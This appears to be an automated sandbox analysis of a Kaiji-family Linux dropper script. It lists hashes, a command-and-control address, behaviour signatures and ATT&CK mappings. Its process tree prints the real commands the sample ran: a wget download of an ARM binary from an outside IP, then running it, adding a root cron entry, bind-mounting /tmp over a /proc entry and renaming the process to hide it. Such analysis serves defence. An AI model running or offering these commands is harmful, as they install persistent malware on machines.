Analysis

- max time kernel: 149s
- max time network: 148s
- platform: debian-9_armhf
- resource: debian9-armhf-20240418-en
- resource tags: arch:armhf, image:debian9-armhf-20240418-en, kernel:4.9.0-13-armmp-lpae, locale:en-us, os:debian-9-armhf, system
- submitted: 16/04/2025, 18:46
- Static task: static1
- Behavioral task: behavioral1 (sample download.sh, resource ubuntu1804-amd64-20250410-en)
- Behavioral task: behavioral2 (sample download.sh, resource debian9-armhf-20240418-en)
- Behavioral task: behavioral3 (sample download.sh, resource debian9-mipsbe-20240729-en)
- Behavioral task: behavioral4 (sample download.sh, resource debian9-mipsel-20240418-en)
General

- Target: download.sh
- Size: 2KB
- MD5: 544a2f391e2800bac07e883d902bcc75
- SHA1: cea67c26c372d03b795bbba678569256385d3b83
- SHA256: 1dc484d51fb96c2097c2eb3695ff55d641e6778dbe8780cbbd0dbdfa688708ca
- SHA512: f281a43fb6443bf15069aee5987d06d493bc0f0f47b927aea17115db168e6bf3271e5f37a0dc7f76defd21b60c24e513fcda0c2f109ce26f5bd4b802de184a4b
Malware Config

- Extracted (kaiji): 154.40.47.248:888
Signatures

Kaiji 1 IoCs
Kaiji payload

| resource | yara_rule |
| --- | --- |
| behavioral2/files/fstream-1.dat | Kaiji |

Kaiji family

File and Directory Permissions Modification 1 TTPs 1 IoCs
Adversaries may modify file or directory permissions to evade defenses.

| pid | Process |
| --- | --- |
| 714 | chmod |

Executes dropped EXE 3 IoCs

| ioc | pid | Process |
| --- | --- | --- |
| /tmp/linux_arm7 | 715 | download.sh |
| /tmp/linux_arm7 | 720 | linux_arm7 |
| /etc/32676 | 727 | sh |

Modifies Watchdog functionality 1 TTPs 2 IoCs
Malware like Mirai modifies the Watchdog to prevent it from restarting an infected system.

| description | ioc | Process |
| --- | --- | --- |
| File opened for modification | /dev/watchdog | linux_arm7 |
| File opened for modification | /dev/misc/watchdog | linux_arm7 |

Creates/modifies Cron job 1 TTPs 1 IoCs
Cron allows running tasks on a schedule, and is commonly used for malware persistence.

| description | ioc | Process |
| --- | --- | --- |
| File opened for modification | /etc/crontab | sh |

Creates/modifies environment variables 1 TTPs 3 IoCs
Creating/modifying environment variables is a common persistence mechanism.

| description | ioc | Process |
| --- | --- | --- |
| File opened for modification | /etc/profile.d/bash_cfg | linux_arm7 |
| File opened for modification | /etc/profile.d/bash_cfg.sh | linux_arm7 |
| File opened for modification | /etc/profile.d/gateway.sh | linux_arm7 |
Enumerates running processes
Discovers information about currently running processes on the system

Modifies init.d

| description | ioc | Process |
| --- | --- | --- |
| File opened for modification | /etc/init.d/kmod | linux_arm7 |
| File opened for modification | /etc/init.d/sudo | linux_arm7 |
| File opened for modification | /etc/init.d/alsa-utils | linux_arm7 |
| File opened for modification | /etc/init.d/cron | linux_arm7 |
| File opened for modification | /etc/init.d/hwclock.sh | linux_arm7 |
| File opened for modification | /etc/init.d/networking | linux_arm7 |
| File opened for modification | /etc/init.d/ssh | linux_arm7 |
| File opened for modification | /etc/init.d/udev | linux_arm7 |
| File opened for modification | /etc/init.d/auditd | linux_arm7 |
| File opened for modification | /etc/init.d/console-setup.sh | linux_arm7 |
| File opened for modification | /etc/init.d/keyboard-setup.sh | linux_arm7 |
| File opened for modification | /etc/init.d/procps | linux_arm7 |
| File opened for modification | /etc/init.d/rsyslog | linux_arm7 |
| File opened for modification | /etc/init.d/selinux-autorelabel | linux_arm7 |
| File opened for modification | /etc/init.d/x11-common | linux_arm7 |
| File opened for modification | /etc/init.d/dbus | linux_arm7 |
| File opened for modification | /etc/init.d/exim4 | linux_arm7 |

Write file to user bin folder 2 IoCs

| description | ioc | Process |
| --- | --- | --- |
| File opened for modification | /usr/bin/include/find | linux_arm7 |
| File opened for modification | /usr/bin/find | linux_arm7 |

Modifies Bash startup script 2 TTPs 3 IoCs

| description | ioc | Process |
| --- | --- | --- |
| File opened for modification | /etc/profile.d/bash_cfg.sh | linux_arm7 |
| File opened for modification | /etc/profile.d/gateway.sh | linux_arm7 |
| File opened for modification | /etc/profile.d/bash_cfg | linux_arm7 |

Changes its process name 1 IoCs

| description | ioc | pid | Process |
| --- | --- | --- | --- |
| Changes the process name, possibly in an attempt to hide itself | ksoftirqd/0 | 720 | linux_arm7 |

Command and Scripting Interpreter: Unix Shell 1 TTPs 2 IoCs
Execute scripts via Unix Shell.

| pid | Process |
| --- | --- |
| 725 | sh |
| 762 | sh |
Enumerates kernel/hardware configuration 1 TTPs 33 IoCs
Reads contents of /sys virtual filesystem to enumerate system information.

Repeated identical reads are collapsed into one row each (the 33 IoCs are two reads of hpage_pmd_size by linux_arm7 and 31 reads of the kdbus path by systemctl).

| description | ioc | Process |
| --- | --- | --- |
| File opened for reading | /sys/fs/kdbus/0-system/bus | systemctl |
| File opened for reading | /sys/kernel/mm/transparent_hugepage/hpage_pmd_size | linux_arm7 |

Reads runtime system information

Repeated identical reads are collapsed into one row each.

| description | ioc | Process |
| --- | --- | --- |
| File opened for reading | /proc/1/environ | systemctl |
| File opened for reading | /proc/self/stat | systemctl |
| File opened for reading | /proc/cmdline | systemctl |
| File opened for reading | /proc/filesystems | systemctl |
| File opened for reading | /proc/filesystems | sed |
| File opened for reading | /proc/filesystems | mount |
| File opened for reading | /proc/301/stat | linux_arm7 |
| File opened for reading | /proc/314/stat | linux_arm7 |
| File opened for reading | /proc/588/stat | linux_arm7 |
| File opened for reading | /proc/630/stat | linux_arm7 |
| File opened for reading | /proc/635/stat | linux_arm7 |
| File opened for reading | /proc/637/stat | linux_arm7 |
| File opened for reading | /proc/720/stat | linux_arm7 |
| File opened for reading | /proc/727/stat | linux_arm7 |
| File opened for reading | /proc/807/stat | linux_arm7 |
| File opened for reading | /proc/814/stat | linux_arm7 |
| File opened for reading | /proc/816/stat | linux_arm7 |
| File opened for reading | /proc/847/stat | linux_arm7 |
| File opened for reading | /proc/849/stat | linux_arm7 |
| File opened for reading | /proc/854/stat | linux_arm7 |
Writes file to tmp directory 1 IoCs
Malware often drops required files in the /tmp directory.

| description | ioc | Process |
| --- | --- | --- |
| File opened for modification | /tmp/linux_arm7 | wget |
Processes

Process tree (path: command line, PID, triggered signatures in brackets):

- /tmp/download.sh: `/tmp/download.sh` (PID 638) [Executes dropped EXE]
  - /bin/uname: `uname -s` (PID 639)
  - /bin/uname: `uname -m` (PID 641)
  - /bin/rm: `rm -f linux_arm7` (PID 644)
  - /usr/bin/wget: `wget -t 1 http://154.40.47.248:8000/linux_arm7` (PID 648) [Writes file to tmp directory]
  - /bin/chmod: `chmod +x linux_arm7` (PID 714) [File and Directory Permissions Modification]
  - /tmp/linux_arm7: `./linux_arm7` (PID 715) [Executes dropped EXE; Enumerates kernel/hardware configuration]
    - /tmp/linux_arm7: `./linux_arm7 " "` (PID 720) [Modifies Watchdog functionality; Creates/modifies environment variables; Modifies init.d; Write file to user bin folder; Modifies Bash startup script; Changes its process name; Enumerates kernel/hardware configuration; Reads runtime system information]
      - /bin/sh: `/bin/sh -c "/etc/32676&"` (PID 725) [Executes dropped EXE; Command and Scripting Interpreter: Unix Shell]
      - /usr/sbin/service: `service crond start` (PID 728)
        - /usr/bin/basename: `basename /usr/sbin/service` (PID 729)
        - /usr/bin/basename: `basename /usr/sbin/service` (PID 731)
        - /bin/systemctl: `systemctl --quiet is-active multi-user.target` (PID 732) [Enumerates kernel/hardware configuration; Reads runtime system information]
        - /bin/sed: `sed -ne "s/\\.socket\\s*[a-z]*\\s*\$/.socket/p"` (PID 735)
        - /bin/systemctl: `systemctl list-unit-files --full "--type=socket"` (PID 734) [Enumerates kernel/hardware configuration]
        - /bin/systemctl: `systemctl -p Triggers show dbus.socket` (PID 736) [Enumerates kernel/hardware configuration; Reads runtime system information]
        - /bin/systemctl: `systemctl -p Triggers show ssh.socket` (PID 737) [Enumerates kernel/hardware configuration; Reads runtime system information]
        - /bin/systemctl: `systemctl -p Triggers show syslog.socket` (PID 738) [Enumerates kernel/hardware configuration; Reads runtime system information]
        - /bin/systemctl: `systemctl -p Triggers show systemd-fsckd.socket` (PID 739) [Enumerates kernel/hardware configuration; Reads runtime system information]
        - /bin/systemctl: `systemctl -p Triggers show systemd-initctl.socket` (PID 740) [Enumerates kernel/hardware configuration; Reads runtime system information]
        - /bin/systemctl: `systemctl -p Triggers show systemd-journald-audit.socket` (PID 743) [Enumerates kernel/hardware configuration]
        - /bin/systemctl: `systemctl -p Triggers show systemd-journald-dev-log.socket` (PID 745) [Enumerates kernel/hardware configuration; Reads runtime system information]
        - /bin/systemctl: `systemctl -p Triggers show systemd-journald.socket` (PID 747) [Enumerates kernel/hardware configuration; Reads runtime system information]
        - /bin/systemctl: `systemctl -p Triggers show systemd-networkd.socket` (PID 749) [Enumerates kernel/hardware configuration; Reads runtime system information]
        - /bin/systemctl: `systemctl -p Triggers show systemd-rfkill.socket` (PID 751) [Enumerates kernel/hardware configuration; Reads runtime system information]
        - /bin/systemctl: `systemctl -p Triggers show systemd-udevd-control.socket` (PID 754) [Enumerates kernel/hardware configuration; Reads runtime system information]
        - /bin/systemctl: `systemctl -p Triggers show systemd-udevd-kernel.socket` (PID 756) [Enumerates kernel/hardware configuration; Reads runtime system information]
      - /usr/local/sbin/systemctl: `systemctl start crond.service` (PID 728)
      - /usr/local/bin/systemctl: `systemctl start crond.service` (PID 728)
      - /usr/sbin/systemctl: `systemctl start crond.service` (PID 728)
      - /usr/bin/systemctl: `systemctl start crond.service` (PID 728)
      - /sbin/systemctl: `systemctl start crond.service` (PID 728)
      - /bin/systemctl: `systemctl start crond.service` (PID 728) [Enumerates kernel/hardware configuration; Reads runtime system information]
      - /bin/sh: `/bin/sh -c "echo \"*/1 * * * * root /.mod \" >> /etc/crontab"` (PID 762) [Creates/modifies Cron job; Command and Scripting Interpreter: Unix Shell]
      - /usr/bin/renice: `renice -20 720` (PID 766)
      - /bin/mount: `mount -o bind /tmp/ /proc/720` (PID 768) [Reads runtime system information]
      - /usr/sbin/service: `service cron start` (PID 769)
        - /usr/bin/basename: `basename /usr/sbin/service` (PID 770)
        - /usr/bin/basename: `basename /usr/sbin/service` (PID 771)
        - /bin/systemctl: `systemctl --quiet is-active multi-user.target` (PID 772) [Enumerates kernel/hardware configuration; Reads runtime system information]
        - /bin/sed: `sed -ne "s/\\.socket\\s*[a-z]*\\s*\$/.socket/p"` (PID 775) [Reads runtime system information]
        - /bin/systemctl: `systemctl list-unit-files --full "--type=socket"` (PID 774) [Enumerates kernel/hardware configuration; Reads runtime system information]
        - /bin/systemctl: `systemctl -p Triggers show dbus.socket` (PID 778) [Enumerates kernel/hardware configuration; Reads runtime system information]
        - /bin/systemctl: `systemctl -p Triggers show ssh.socket` (PID 779) [Enumerates kernel/hardware configuration; Reads runtime system information]
        - /bin/systemctl: `systemctl -p Triggers show syslog.socket` (PID 780) [Enumerates kernel/hardware configuration; Reads runtime system information]
        - /bin/systemctl: `systemctl -p Triggers show systemd-fsckd.socket` (PID 781) [Enumerates kernel/hardware configuration; Reads runtime system information]
        - /bin/systemctl: `systemctl -p Triggers show systemd-initctl.socket` (PID 782) [Enumerates kernel/hardware configuration; Reads runtime system information]
        - /bin/systemctl: `systemctl -p Triggers show systemd-journald-audit.socket` (PID 784) [Enumerates kernel/hardware configuration]
        - /bin/systemctl: `systemctl -p Triggers show systemd-journald-dev-log.socket` (PID 785) [Enumerates kernel/hardware configuration; Reads runtime system information]
        - /bin/systemctl: `systemctl -p Triggers show systemd-journald.socket` (PID 786) [Enumerates kernel/hardware configuration; Reads runtime system information]
        - /bin/systemctl: `systemctl -p Triggers show systemd-networkd.socket` (PID 787) [Enumerates kernel/hardware configuration; Reads runtime system information]
        - /bin/systemctl: `systemctl -p Triggers show systemd-rfkill.socket` (PID 789) [Enumerates kernel/hardware configuration; Reads runtime system information]
        - /bin/systemctl: `systemctl -p Triggers show systemd-udevd-control.socket` (PID 790) [Enumerates kernel/hardware configuration; Reads runtime system information]
        - /bin/systemctl: `systemctl -p Triggers show systemd-udevd-kernel.socket` (PID 791) [Enumerates kernel/hardware configuration; Reads runtime system information]
      - /usr/local/sbin/systemctl: `systemctl start cron.service` (PID 769)
      - /usr/local/bin/systemctl: `systemctl start cron.service` (PID 769)
      - /usr/sbin/systemctl: `systemctl start cron.service` (PID 769)
      - /usr/bin/systemctl: `systemctl start cron.service` (PID 769)
      - /sbin/systemctl: `systemctl start cron.service` (PID 769)
      - /bin/systemctl: `systemctl start cron.service` (PID 769) [Enumerates kernel/hardware configuration; Reads runtime system information]
      - /bin/systemctl: `systemctl start crond.service` (PID 792) [Enumerates kernel/hardware configuration; Reads runtime system information]
  - /bin/rm: `/bin/rm /tmp/download.sh` (PID 721)
- /etc/32676: `/etc/32676` (PID 727)
  - /bin/sleep: `sleep 60` (PID 730)
  - /bin/sleep: `sleep 60` (PID 830)
  - /bin/sleep: `sleep 60` (PID 854)
Network

MITRE ATT&CK Enterprise v16

Execution
- Command and Scripting Interpreter (1)
  - Unix Shell (1)
- Scheduled Task/Job (1)
  - Cron (1)

Persistence
- Boot or Logon Autostart Execution (2)
- Boot or Logon Initialization Scripts (1)
  - RC Scripts (1)
- Event Triggered Execution (1)
  - Unix Shell Configuration Modification (1)
- Hijack Execution Flow (1)
  - Path Interception by PATH Environment Variable (1)
- Scheduled Task/Job (1)
  - Cron (1)

Privilege Escalation
- Boot or Logon Autostart Execution (2)
- Boot or Logon Initialization Scripts (1)
  - RC Scripts (1)
- Event Triggered Execution (1)
  - Unix Shell Configuration Modification (1)
- Hijack Execution Flow (1)
  - Path Interception by PATH Environment Variable (1)
- Scheduled Task/Job (1)
  - Cron (1)
Downloads